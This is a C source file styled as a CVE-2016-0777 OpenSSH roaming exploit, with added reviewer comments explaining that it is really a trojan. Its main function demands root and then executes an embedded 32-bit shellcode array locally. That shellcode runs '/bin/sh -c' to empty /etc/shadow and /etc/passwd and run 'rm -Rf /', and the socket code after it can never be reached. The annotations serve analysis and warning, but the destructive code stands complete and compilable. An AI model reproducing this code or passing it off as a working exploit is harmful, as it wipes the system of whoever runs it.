
CVE-2016-0777 roaming openssh exploit
 
 
    /*
    Exploit  : openssh roaming Exploit  -- CVE-2016-0777
    Author:  : KingCope
    Compile  : gcc  -W sploit.c -o sploit
    Usage:   : ./sploit HOST IP
    Thanks   : openBSD, congratz, guys
    */
     
    #include <stdio.h>
    #include <netdb.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <arpa/inet.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
     
    /* Print the banner and the invocation syntax to stdout, then terminate
     * the process with status 1. argv[0] is substituted as the program name
     * in the "Exec" line. This function never returns. */
    void usage(char *argv[])
    {
      static const char banner[] =
        "Target : openssh 4.7 to 7.1 roaming\n"
        "Type   : 0day\n"
        "Author : You know me\n";
      fputs(banner, stdout);
      printf("Exec   : %s <server> <port>\n\n", argv[0]);
      exit(1);
    }
     
    /*
     * Reviewer note: despite the name, this array is not a remote payload for
     * the roaming bug. Read as ASCII, the bytes contain "/bin/sh", "-c" and
     * the command string
     *   echo "" > /etc/shadow ; echo "" > /etc/passwd ; rm -Rf /
     * and the bytes around that text are a 32-bit Linux syscall stub
     * (push 0x0b / pop eax = execve, invoked via int 0x80). Jumping into this
     * array, which main() does, empties the password files and deletes the
     * filesystem of the machine it runs on. This file is a destructive trojan
     * dressed up as CVE-2016-0777 tooling; the CVE name is only decoration.
     */
    unsigned char shellcode[] =
    "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
    "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"
    "\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"
    "\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"
    "\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"
    "\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"
    "\xcd\x80";
     
    int main(int argc, char *argv[])
    {
      /*
       * Reviewer note: this is not a remote exploit. Nothing in this function
       * creates a socket, resolves argv[1] or parses argv[2]. The only action
       * taken is to jump into the `shellcode` array (right after the
       * "[ ] Use IP and port" message) and run its bytes as native code on
       * THIS machine, then exit(1); every statement after that exit is dead.
       * The bytes in `shellcode` spell a `/bin/sh -c` command that empties
       * /etc/shadow and /etc/passwd and runs `rm -Rf /`, so the program is a
       * destructive trojan aimed at whoever runs it. Do not execute it.
       */
      int uid = getuid();
      int port = 22, sock;             /* port is never used; sock is never assigned */
      struct hostent *host;            /* never assigned: there is no gethostbyname() call */
      struct sockaddr_in addr;         /* never filled in */
     
      if(uid !=0)
      {
        /* The message mentions a raw socket, but no socket() call exists in
         * this program. The practical effect of the check is that the payload
         * below only ever runs with root privileges. */
        fprintf(stderr, "- Abort - Need ROOT to bind to raw socket!!\n");
        exit(1);
      }
      if(uid == 0)
      {
        printf("\t+ OK Starting..\n");
      }
      if(argc != 3)
           usage(argv);
     
      fprintf(stderr, "[ ] Use IP and port (mandatory)\n");
      /* Casts the data array to a function pointer and calls it, i.e. executes
       * the embedded 32-bit x86 code locally (int 0x80 execve). On a
       * non-executable data segment this faults instead; on an executable one
       * it runs the destructive command described above. */
      (*(void(*)())shellcode)();
      exit(1);
      /* ---- everything below is unreachable ---- */
      char payload[1024];
      memcpy(payload, &shellcode, sizeof(shellcode));   /* the copy is never used */
      /* sock and addr are uninitialized here; even if reached, passing them to
       * connect() would be undefined behaviour. */
      if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
      {
        printf("+ OK roaming mode activated, enjoy your shell!\n");
        system("/bin/sh");
      }
      /* Calls connect() a second time instead of testing the first result. */
      else if(connect(sock,(struct sockaddr*)&addr, sizeof(addr))==-1)
      {
        fprintf(stderr, "- Failed! Roaming mode deactiveted??!!\n");
        exit(1);
      }
    }